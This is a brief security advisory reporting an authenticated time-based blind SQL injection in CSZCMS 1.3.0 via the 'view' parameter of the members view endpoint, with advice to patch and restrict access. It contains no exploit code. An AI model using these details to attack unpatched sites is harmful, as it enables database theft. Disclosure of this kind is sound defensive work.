Abdulaziz Almetairy

**Name of the Vulnerable Software and Affected Versions** CSZCMS version 1.3.0 **Description** The software contains an authenticated SQL injection issue in the members view functionality. Authenticated attackers can manipulate database queries by injecting malicious SQL code through the `view` parameter. This allows for time-based blind SQL injection attacks, potentially leading to the extraction of database information. The affected API endpoint is the members view endpoint. **Recommendations** Apply a fix for CSZCMS version 1.3.0 to address the SQL injection issue. As a temporary workaround, restrict access to the members view functionality to minimize the risk of exploitation.